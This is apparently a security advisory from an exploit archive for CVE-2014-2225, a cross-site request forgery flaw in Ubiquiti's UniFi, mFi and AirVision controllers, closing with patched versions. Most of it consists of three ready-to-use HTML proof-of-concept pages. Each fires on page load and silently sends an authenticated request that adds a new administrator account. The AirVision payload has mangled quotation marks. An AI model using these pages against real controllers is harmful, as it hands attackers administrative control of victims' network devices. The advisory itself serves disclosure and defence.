142 lines
No EOL
2.8 KiB
Text
142 lines
No EOL
2.8 KiB
Text
# Vendor Homepage: (http://www.ubnt.com/)
|
|
|
|
# Tested on: Kali Linux
|
|
-----------------------------------------
|
|
Affected Products/Versions:
|
|
-----------------------------------------
|
|
UniFi Controller v2.4.6
|
|
mFi Controller v2.0.15
|
|
AirVision Controller v2.1.3
|
|
Note: Previous versions may be affected
|
|
|
|
|
|
-----------------
|
|
Description:
|
|
-----------------
|
|
Title: Cross-site Request Forgery (CSRF)
|
|
CVE: CVE-2014-2225
|
|
CWE: http://cwe.mitre.org/data/definitions/352.html
|
|
|
|
|
|
Detailed writeup: http://sethsec.blogspot.com/2014/07/cve-2014-2225.html
|
|
Researcher: Seth Art - @sethsec
|
|
|
|
---------------
|
|
UniFi POC:
|
|
|
|
---------------
|
|
|
|
<html>
|
|
<head>
|
|
<script>
|
|
function sendCSRF()
|
|
{
|
|
var url_base = "https://192.168.0.106:8443/api/add/admin"
|
|
|
|
var post_data="%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D"
|
|
|
|
var xmlhttp;
|
|
xmlhttp = new XMLHttpRequest();
|
|
xmlhttp.open("POST", url_base, true);
|
|
xmlhttp.setRequestHeader("Accept","*/*");
|
|
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded;
|
|
|
|
|
|
charset=UTF-8");
|
|
xmlhttp.withCredentials= "true";
|
|
xmlhttp.send(post_data);
|
|
}
|
|
|
|
</script>
|
|
</head>
|
|
<body>
|
|
<h1>CSRF POC</h1>
|
|
Sending CSRF Payload!!!
|
|
|
|
<body onload="sendCSRF()">
|
|
|
|
</body>
|
|
|
|
-------------
|
|
mFi POC:
|
|
-------------
|
|
<html>
|
|
<head>
|
|
<script>
|
|
function sendCSRF()
|
|
{
|
|
var url_base = "https://192.168.0.106:6443/api/v1.0/add/admin"
|
|
|
|
|
|
var post_data="%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D"
|
|
|
|
var xmlhttp;
|
|
xmlhttp = new XMLHttpRequest();
|
|
xmlhttp.open("POST", url_base, true);
|
|
|
|
|
|
xmlhttp.setRequestHeader("Accept","*/*");
|
|
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded;
|
|
charset=UTF-8");
|
|
xmlhttp.withCredentials= "true";
|
|
|
|
|
|
xmlhttp.send(post_data);
|
|
}
|
|
|
|
</script>
|
|
</head>
|
|
<body>
|
|
<h1>CSRF POC</h1>
|
|
Sending CSRF Payload!!!
|
|
<body onload="sendCSRF()">
|
|
</body>
|
|
|
|
|
|
|
|
--------------------
|
|
|
|
AirVision POC:
|
|
--------------------
|
|
<html>
|
|
<head>
|
|
<script>
|
|
function sendCSRF()
|
|
{
|
|
var url_base = "https://192.168.0.106:7443/api/v2.0/admin"
|
|
|
|
|
|
var post_data="{\”name\”:\”csrf\”,\”email\”:\”csrf@gmail.com\”,\”userGroup:\”:\”admin\”,\”x_password\”:\”password\”,\”confirmPassword\”:\”password\”,\”disabled\”:\”false\”}”
|
|
|
|
|
|
var xmlhttp;
|
|
xmlhttp = new XMLHttpRequest();
|
|
xmlhttp.open("POST", url_base, true);
|
|
xmlhttp.setRequestHeader("Accept","*/*");
|
|
xmlhttp.setRequestHeader("Content-type","application/plain; charset=UTF-8");
|
|
|
|
|
|
xmlhttp.withCredentials= "true";
|
|
xmlhttp.send(post_data);
|
|
}
|
|
|
|
</script>
|
|
</head>
|
|
<body>
|
|
<h1>CSRF POC</h1>
|
|
Sending CSRF Payload!!!
|
|
<body onload="sendCSRF()">
|
|
|
|
|
|
</body>
|
|
|
|
|
|
|
|
-------------
|
|
Solution:
|
|
-------------
|
|
UniFi Controller - Upgrade to UniFi Controller v3.2.1 or greater
|
|
mFi Controller - Upgrade to mFi Controller v2.0.24 or greater
|
|
AirVision Controller - Upgrade to UniFi Video v3.0.1 or greater (Note:
|
|
|
|
The application name changed from AirVision to UniFi Video) |